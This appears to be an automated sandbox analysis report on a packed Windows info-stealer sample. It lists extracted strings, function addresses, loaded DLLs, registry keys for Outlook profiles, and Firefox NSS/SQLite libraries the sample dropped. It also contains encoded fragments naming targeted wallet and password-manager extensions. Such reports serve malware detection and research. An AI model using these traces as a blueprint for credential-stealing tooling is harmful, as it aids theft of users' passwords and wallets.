Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1894074497.0000000029431000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1894074497.0000000029431000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C5EED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C62B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C62B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C62B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C5CF280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B	0_2_00D3C89B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C25894	0_2_00C25894
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3288A	0_2_00D3288A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D391FA	0_2_00D391FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2F157	0_2_00D2F157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C8895F	0_2_00C8895F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3E2E5	0_2_00D3E2E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C82BB6	0_2_00C82BB6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3437B	0_2_00D3437B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C89363	0_2_00C89363
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E42B0A	0_2_00E42B0A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D424FB	0_2_00D424FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C84C98	0_2_00C84C98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE64CE	0_2_00BE64CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D35D60	0_2_00D35D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D30D69	0_2_00D30D69
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCF7B3	0_2_00CCF7B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C35A0	0_2_6C5C35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D5440	0_2_6C5D5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63545C	0_2_6C63545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63542B	0_2_6C63542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63AC00	0_2_6C63AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C605C10	0_2_6C605C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C612C10	0_2_6C612C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED4D0	0_2_6C5ED4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C606CF0	0_2_6C606CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D64C0	0_2_6C5D64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CD4E0	0_2_6C5CD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6234A0	0_2_6C6234A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62C4A0	0_2_6C62C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D6C80	0_2_6C5D6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F0512	0_2_6C5F0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EED10	0_2_6C5EED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DFD00	0_2_6C5DFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6285F0	0_2_6C6285F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C600DD0	0_2_6C600DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636E63	0_2_6C636E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9E50	0_2_6C5E9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4640	0_2_6C5E4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CC670	0_2_6C5CC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C612E4E	0_2_6C612E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C603E50	0_2_6C603E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C629E30	0_2_6C629E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C615600	0_2_6C615600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C607E10	0_2_6C607E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6376E3	0_2_6C6376E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CBEF0	0_2_6C5CBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DFEF0	0_2_6C5DFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C624EA0	0_2_6C624EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E5E90	0_2_6C5E5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62E680	0_2_6C62E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D9F00	0_2_6C5D9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C607710	0_2_6C607710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6FF0	0_2_6C5F6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CDFE0	0_2_6C5CDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6177A0	0_2_6C6177A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E8850	0_2_6C5E8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED850	0_2_6C5ED850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60F070	0_2_6C60F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60B820	0_2_6C60B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C614820	0_2_6C614820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D7810	0_2_6C5D7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6058E0	0_2_6C6058E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6350C7	0_2_6C6350C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EC0E0	0_2_6C5EC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F60A0	0_2_6C5F60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61B970	0_2_6C61B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63B170	0_2_6C63B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA940	0_2_6C5EA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DD960	0_2_6C5DD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FD9B0	0_2_6C5FD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C605190	0_2_6C605190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C622990	0_2_6C622990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CC9A0	0_2_6C5CC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609A60	0_2_6C609A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60E2F0	0_2_6C60E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C608AC0	0_2_6C608AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E1AF0	0_2_6C5E1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C632AB0	0_2_6C632AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DCAB0	0_2_6C5DCAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63BA90	0_2_6C63BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C22A0	0_2_6C5C22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F4AA0	0_2_6C5F4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C5340	0_2_6C5C5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DC370	0_2_6C5DC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60D320	0_2_6C60D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6353C8	0_2_6C6353C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CF380	0_2_6C5CF380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6094D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5FCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 009745C0 appears 316 times

Source: file.exe, 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1959123282.000000006C845000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: buyyxrmv ZLIB complexity 0.9949027185501066

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: file.exe, 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C627030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C627030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00988680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00988680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00983720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00983720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\QAG3HTB3.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1812462131.000000001D154000.00000004.00000020.00020000.00000000.sdmp, HJJJECFIECBGDGCAAAEH.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1837056 > 1048576

Source: file.exe

Static PE information: Raw size of buyyxrmv is bigger than: 0x100000 < 0x19a600

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.970000.0.unpack :EW;.rsrc :W;.idata :W; :EW;buyyxrmv:EW;hmyklufj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;buyyxrmv:EW;hmyklufj:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00989860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00989860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1cf351 should be: 0x1c2e04

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: buyyxrmv
Source: file.exe	Static PE information: section name: hmyklufj
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E08B push cs; retf	0_2_0098E0A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6C0C0 push edi; mov dword ptr [esp], ecx	0_2_00D6C853
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE68FB push ebp; mov dword ptr [esp], ecx	0_2_00DE693F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE68FB push edi; mov dword ptr [esp], ecx	0_2_00DE6970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edx; mov dword ptr [esp], ebp	0_2_00D3C8A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 39BD330Dh; mov dword ptr [esp], edi	0_2_00D3C8D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 0143501Bh; mov dword ptr [esp], esi	0_2_00D3C90F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push eax; mov dword ptr [esp], 688F8816h	0_2_00D3C929
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], ebx	0_2_00D3C97E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ebp; mov dword ptr [esp], edx	0_2_00D3C9A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ebp; mov dword ptr [esp], 56047201h	0_2_00D3C9F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ebx; mov dword ptr [esp], edx	0_2_00D3CA0E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push esi; mov dword ptr [esp], 50A86E1Ch	0_2_00D3CA12
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], edx	0_2_00D3CA53
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 34509D17h; mov dword ptr [esp], eax	0_2_00D3CADB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], edi	0_2_00D3CB0F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], esi	0_2_00D3CB4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 0E6E3076h; mov dword ptr [esp], eax	0_2_00D3CB8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 53A07CB4h; mov dword ptr [esp], ebp	0_2_00D3CBA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], ebx	0_2_00D3CBE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push eax; mov dword ptr [esp], edx	0_2_00D3CC05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], 36ED59FFh	0_2_00D3CC09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], esi	0_2_00D3CC68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edx; mov dword ptr [esp], 1C6E5185h	0_2_00D3CCAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edx; mov dword ptr [esp], eax	0_2_00D3CD4C
